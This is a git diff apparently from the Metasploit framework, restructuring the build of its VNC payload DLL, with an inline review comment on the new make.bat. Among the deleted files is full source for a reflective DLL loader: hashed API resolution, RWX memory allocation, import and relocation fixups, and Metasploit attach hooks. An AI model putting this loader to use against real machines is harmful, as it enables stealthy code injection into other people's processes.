the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // 
store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - __movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA ); - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. 
- while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - __movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD ); - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume their is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all imports - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) - { - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the 
address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( UINT_PTR ); - if( uiValueD ) - uiValueD += sizeof( UINT_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... 
- - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! 
- if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: process the images exception directory if it has one (PE32+ for x64) -/* - // uiValueB = the address of the relocation directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ]; - // check if their are any exception etries present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // get the number of entries - uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY ); - - // uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all entries - while( uiValueA-- ) - { - //((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress - - // get the next entry - uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY ); - } - } -*/ - // STEP 7: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - // call our respective entry point, fudging our hInstance value -#ifdef 
REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// you must implement this function... -extern DWORD DLLEXPORT Init( SOCKET socket ); - -BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ); - return TRUE; -} - -BOOL MetasploitDllDetach( DWORD dwExitFunc ) -{ - switch( dwExitFunc ) - { - case EXITFUNC_SEH: - SetUnhandledExceptionFilter( NULL ); - break; - case EXITFUNC_THREAD: - ExitThread( 0 ); - break; - case EXITFUNC_PROCESS: - ExitProcess( 0 ); - break; - default: - break; - } - - return TRUE; -} - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - switch( dwReason ) - { - case DLL_METASPLOIT_ATTACH: - bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved ); - break; - case DLL_METASPLOIT_DETACH: - bReturnValue = MetasploitDllDetach( (DWORD)lpReserved ); - break; - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif -//===============================================================================================// 
diff --git a/external/source/vncdll/loader/ReflectiveLoader.h b/external/source/vncdll/loader/ReflectiveLoader.h deleted file mode 100644 index 597eb5d457..0000000000 --- a/external/source/vncdll/loader/ReflectiveLoader.h +++ /dev/null 
@@ -1,197 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. - // -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H -#define _VNCDLL_LOADER_REFLECTIVELOADER_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include - -#include "ReflectiveDLLInjection.h" - -#define EXITFUNC_SEH 0xEA320EFE -#define EXITFUNC_THREAD 0x0A2A1DE0 -#define EXITFUNC_PROCESS 0x56A2B5F0 - -typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); -typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); -typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); - -#define KERNEL32DLL_HASH 0x6A4ABC5B -#define LOADLIBRARYA_HASH 0xEC0E4E8E -#define GETPROCADDRESS_HASH 0x7C0DFCAA -#define VIRTUALALLOC_HASH 0x91AFCA54 - -#define HASH_KEY 13 -//===============================================================================================// -#pragma intrinsic( _rotr ) - -__forceinline DWORD ror( DWORD d ) -{ - return _rotr( d, HASH_KEY ); -} - - - -__forceinline DWORD hash( char * c ) -{ - register DWORD h = 0; - do - { - h = ror( h ); - h += *c; - } while( *++c ); - - return h; -} -//===============================================================================================// -typedef struct _UNICODE_STR -{ - USHORT Length; - USHORT MaximumLength; - PWSTR pBuffer; -} UNICODE_STR, *PUNICODE_STR; - -// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY -//__declspec( align(8) ) -typedef struct _LDR_DATA_TABLE_ENTRY -{ - //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. 
- LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STR FullDllName; - UNICODE_STR BaseDllName; - ULONG Flags; - SHORT LoadCount; - SHORT TlsIndex; - LIST_ENTRY HashTableEntry; - ULONG TimeDateStamp; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - -// WinDbg> dt -v ntdll!_PEB_LDR_DATA -typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -{ - DWORD dwLength; - DWORD dwInitialized; - LPVOID lpSsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - LPVOID lpEntryInProgress; -} PEB_LDR_DATA, * PPEB_LDR_DATA; - -// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK -typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes -{ - struct _PEB_FREE_BLOCK * pNext; - DWORD dwSize; -} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; - -// struct _PEB is defined in Winternl.h but it is incomplete -// WinDbg> dt -v ntdll!_PEB -typedef struct __PEB // 65 elements, 0x210 bytes -{ - BYTE bInheritedAddressSpace; - BYTE bReadImageFileExecOptions; - BYTE bBeingDebugged; - BYTE bSpareBool; - LPVOID lpMutant; - LPVOID lpImageBaseAddress; - PPEB_LDR_DATA pLdr; - LPVOID lpProcessParameters; - LPVOID lpSubSystemData; - LPVOID lpProcessHeap; - PRTL_CRITICAL_SECTION pFastPebLock; - LPVOID lpFastPebLockRoutine; - LPVOID lpFastPebUnlockRoutine; - DWORD dwEnvironmentUpdateCount; - LPVOID lpKernelCallbackTable; - DWORD dwSystemReserved; - DWORD dwAtlThunkSListPtr32; - PPEB_FREE_BLOCK pFreeList; - DWORD dwTlsExpansionCounter; - LPVOID lpTlsBitmap; - DWORD dwTlsBitmapBits[2]; - LPVOID lpReadOnlySharedMemoryBase; - LPVOID lpReadOnlySharedMemoryHeap; - LPVOID lpReadOnlyStaticServerData; - LPVOID lpAnsiCodePageData; - LPVOID lpOemCodePageData; - LPVOID lpUnicodeCaseTableData; - DWORD dwNumberOfProcessors; - DWORD dwNtGlobalFlag; - LARGE_INTEGER liCriticalSectionTimeout; - DWORD dwHeapSegmentReserve; - DWORD dwHeapSegmentCommit; - DWORD 
dwHeapDeCommitTotalFreeThreshold; - DWORD dwHeapDeCommitFreeBlockThreshold; - DWORD dwNumberOfHeaps; - DWORD dwMaximumNumberOfHeaps; - LPVOID lpProcessHeaps; - LPVOID lpGdiSharedHandleTable; - LPVOID lpProcessStarterHelper; - DWORD dwGdiDCAttributeList; - LPVOID lpLoaderLock; - DWORD dwOSMajorVersion; - DWORD dwOSMinorVersion; - WORD wOSBuildNumber; - WORD wOSCSDVersion; - DWORD dwOSPlatformId; - DWORD dwImageSubsystem; - DWORD dwImageSubsystemMajorVersion; - DWORD dwImageSubsystemMinorVersion; - DWORD dwImageProcessAffinityMask; - DWORD dwGdiHandleBuffer[34]; - LPVOID lpPostProcessInitRoutine; - LPVOID lpTlsExpansionBitmap; - DWORD dwTlsExpansionBitmapBits[32]; - DWORD dwSessionId; - ULARGE_INTEGER liAppCompatFlags; - ULARGE_INTEGER liAppCompatFlagsUser; - LPVOID lppShimData; - LPVOID lpAppCompatInfo; - UNICODE_STR usCSDVersion; - LPVOID lpActivationContextData; - LPVOID lpProcessAssemblyStorageMap; - LPVOID lpSystemDefaultActivationContextData; - LPVOID lpSystemAssemblyStorageMap; - DWORD dwMinimumStackCommit; -} _PEB, * _PPEB; - -typedef struct -{ - WORD offset:12; - WORD type:4; -} IMAGE_RELOC, *PIMAGE_RELOC; -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/loader/loader.rc b/external/source/vncdll/loader/loader.rc deleted file mode 100644 index 678e8d5576..0000000000 --- a/external/source/vncdll/loader/loader.rc +++ /dev/null @@ -1,6 +0,0 @@ - -#ifdef _X64_ -IDR_VNC_DLL IMG DISCARDABLE "../winvnc/x64/release/vnc.x64.dll" -#else -IDR_VNC_DLL IMG DISCARDABLE "../winvnc/release/vnc.dll" -#endif diff --git a/external/source/vncdll/loader/loader.vcproj b/external/source/vncdll/loader/loader.vcproj deleted file mode 100644 index 79c60dcb46..0000000000 --- a/external/source/vncdll/loader/loader.vcproj +++ /dev/null 
@@ -1,437 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/external/source/vncdll/make.bat b/external/source/vncdll/make.bat new file mode 100755 index 0000000000..fee7434034 --- /dev/null +++ b/external/source/vncdll/make.bat @@ -0,0 +1,32 @@ +@ECHO OFF +IF "%VCINSTALLDIR%" == "" GOTO NEED_VS + +IF "%1"=="x86" GOTO BUILD_X86 +IF "%1"=="X64" GOTO BUILD_X64 + +ECHO "Building VNCDLL x64 and x86 (Release)" +SET PLAT=all +GOTO RUN + +:BUILD_X86 +ECHO "Building VNCDLL x86 (Release)" +SET PLAT=x86 +GOTO RUN + +:BUILD_X64 +ECHO "Building VNCDLL x64 (Release)" +SET PLAT=x64 +GOTO RUN + +:RUN +PUSHD workspace +msbuild.exe make.msbuild /target:%PLAT% +POPD + +GOTO :END + +:NEED_VS +ECHO "This command must be executed from within a Visual Studio Command prompt." +ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools" + +:END diff --git a/external/source/vncdll/make.msbuild b/external/source/vncdll/make.msbuild new file mode 100755 index 0000000000..ae4ea05084 --- /dev/null +++ b/external/source/vncdll/make.msbuild @@ -0,0 +1,19 @@ + + + + .\vncdll.sln + + + + + + + + + + + + + + + diff --git a/external/source/vncdll/output/vncdll.dll b/external/source/vncdll/output/vncdll.dll deleted file mode 100644 index f0bd4da8a5..0000000000 Binary files a/external/source/vncdll/output/vncdll.dll and /dev/null differ diff --git a/external/source/vncdll/output/vncdll.x64.dll b/external/source/vncdll/output/vncdll.x64.dll deleted file mode 100644 index c8d1ff48d8..0000000000 Binary files a/external/source/vncdll/output/vncdll.x64.dll and /dev/null differ 
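Review bot: In the new `make.bat`, the x64 argument check is case-sensitive and capitalised differently from the x86 one, so `make.bat x64` matches neither branch and silently builds both platforms. Using `IF /I "%1"=="x86" GOTO BUILD_X86` and `IF /I "%1"=="x64" GOTO BUILD_X64` would accept either spelling. Separately, `:RUN` does `PUSHD workspace` before calling `msbuild.exe make.msbuild`, but this commit adds `make.msbuild` next to `make.bat` and no `workspace` directory appears in the diff. If that directory does not exist, the `PUSHD` fails unchecked and the later `POPD` is unbalanced, so the pair should probably be dropped. The script also ends without `EXIT /B %ERRORLEVEL%`, so a failed msbuild run is not reported to a calling script or CI job.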
diff --git a/external/source/vncdll/winvnc/vncdll.sln b/external/source/vncdll/vncdll.sln old mode 100644 new mode 100755 similarity index 66% rename from external/source/vncdll/winvnc/vncdll.sln rename to external/source/vncdll/vncdll.sln index 71cfe625d9..613b2fcbab --- a/external/source/vncdll/winvnc/vncdll.sln +++ b/external/source/vncdll/vncdll.sln @@ -1,11 +1,10 @@ -Microsoft Visual Studio Solution File, Format Version 10.00 -# Visual C++ Express 2008 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "WinVNC.vcproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}" +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.21005.1 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "winvnc\WinVNC.vcxproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}" EndProject -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "..\loader\loader.vcproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}" - ProjectSection(ProjectDependencies) = postProject - {EA6A09AC-04BB-423D-8842-CA48DF901058} = {EA6A09AC-04BB-423D-8842-CA48DF901058} - EndProjectSection +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vncdll", "vncdll\vncdll.vcxproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution 
@@ -15,19 +14,22 @@ Global
 Release|x64 = Release|x64
 EndGlobalSection
 GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
+ {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32
- {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|Win32
+ {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|x64
+ {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.Build.0 = Debug|x64
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64
 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|Win32
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
- {B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
 EndGlobalSection
 GlobalSection(SolutionProperties) = preSolution
 HideSolutionNode = FALSE
diff --git a/external/source/vncdll/loader/LICENSE.txt b/external/source/vncdll/vncdll/LICENSE.txt
similarity index 100%
rename from external/source/vncdll/loader/LICENSE.txt
rename to external/source/vncdll/vncdll/LICENSE.txt
diff --git a/external/source/vncdll/loader/context.c b/external/source/vncdll/vncdll/context.c
old mode 100644
new mode 100755
similarity index 96%
rename from external/source/vncdll/loader/context.c
rename to external/source/vncdll/vncdll/context.c
index e617aa0c15..3d270c14bb
--- a/external/source/vncdll/loader/context.c
+++ b/external/source/vncdll/vncdll/context.c
@@ -76,7 +76,7 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter )
 {
 do
 {
- _snprintf( cNamedPipe, MAX_PATH, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
+ _snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
 dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe );
diff --git a/external/source/vncdll/loader/context.h b/external/source/vncdll/vncdll/context.h
similarity index 100%
rename from external/source/vncdll/loader/context.h
rename to external/source/vncdll/vncdll/context.h
diff --git a/external/source/vncdll/loader/inject.c b/external/source/vncdll/vncdll/inject.c
old mode 100644
new mode 100755
similarity index 97%
rename from external/source/vncdll/loader/inject.c
rename to external/source/vncdll/vncdll/inject.c
index d0386434dc..3414584dc6
--- a/external/source/vncdll/loader/inject.c
+++ b/external/source/vncdll/vncdll/inject.c
@@ -1,7 +1,7 @@
 #include "loader.h"
 #include "ps.h"
 #include "inject.h"
-#include "LoadLibraryR.h"
+#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
 #include
 // Simple trick to get the current meterpreters arch
diff --git a/external/source/vncdll/loader/inject.h b/external/source/vncdll/vncdll/inject.h
similarity index 100%
rename from external/source/vncdll/loader/inject.h
rename to external/source/vncdll/vncdll/inject.h
diff --git a/external/source/vncdll/loader/loader.c b/external/source/vncdll/vncdll/loader.c
old mode 100644
new mode 100755
similarity index 95%
rename from external/source/vncdll/loader/loader.c
rename to external/source/vncdll/vncdll/loader.c
index c7d7d2626e..251f548066
--- a/external/source/vncdll/loader/loader.c
+++ b/external/source/vncdll/vncdll/loader.c
@@ -5,11 +5,12 @@
 #include "ps.h"
 #include "session.h"
 #include "inject.h"
-#include "ReflectiveLoader.h"
 #define VNCFLAG_DISABLECOURTESYSHELL 1
 #define VNCFLAG_DISABLESESSIONTRACKING 2
+#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+
 /*
 * The HINSTANCE of this injected dll.
 */
@@ -173,7 +174,7 @@ DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
 hAgentProcess = hProcess;
- _snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory );
+ _snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, COMMANDLINE_LENGTH - 1, "/v /c:0x%08p", lpMemory );
 } while( 0 );
diff --git a/external/source/vncdll/loader/loader.h b/external/source/vncdll/vncdll/loader.h
similarity index 100%
